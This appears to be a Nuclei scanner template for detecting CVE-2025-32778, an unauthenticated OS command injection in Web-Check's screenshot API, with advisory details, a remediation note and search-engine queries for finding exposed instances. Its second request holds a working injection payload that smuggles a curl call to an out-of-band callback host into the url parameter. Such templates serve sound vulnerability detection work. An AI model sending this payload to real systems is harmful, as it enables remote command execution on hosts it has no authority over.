id: CVE-2025-32778 info: name: Web-Check < 2.0.1 Screenshot API - OS Command Injection author: gugacyber severity: critical description: | Lissy93/web-check contains a command injection caused by unsanitized user input in the screenshot API, letting attackers execute arbitrary system commands, exploit requires sending crafted url parameters. impact: | Attackers can execute arbitrary commands on the host, potentially leading to remote code execution or system compromise. remediation: | Upgrade Web-Check to version 2.0.1 or later. The fix replaces exec() with execFile(), which avoids shell interpretation and properly isolates command arguments. reference: - https://github.com/Lissy93/web-check/security/advisories/GHSA-jqhf-j4w8-4grr - https://github.com/Lissy93/web-check/commit/0e4958aa10b2650d32439a799f6fc83a7cd46cef - https://nvd.nist.gov/vuln/detail/CVE-2025-32778 - https://osv.dev/vulnerability/CVE-2025-32778 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-32778 cwe-id: CWE-78 epss-score: 0.19976 epss-percentile: 0.97093 metadata: verified: true max-request: 2 vendor: lissy93 product: web-check shodan-query: http.title:"Web-Check" fofa-query: title="Web-Check" tags: cve,cve2025,web-check,rce,injection,unauth,oast,vkev flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 matchers: - type: word words: - "Web Check" part: body case-insensitive: true internal: true - raw: - | GET /api/screenshot?url=http://x%22%3bcurl${IFS}http://{{interactsh-url}}%3b%23 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: status status: - 200 # digest: 4a0a00473045022100deb71a8dd6dfb589d4693c70774eff1b7c2f84ca91d1c5d3e273f8ac6601adb0022041cf2f4a2bcc32f75370e56ccbccece47a7ba1a8d258e4a4dd6ba403c34715b2:922c64590222798bb761d5b6d8e72950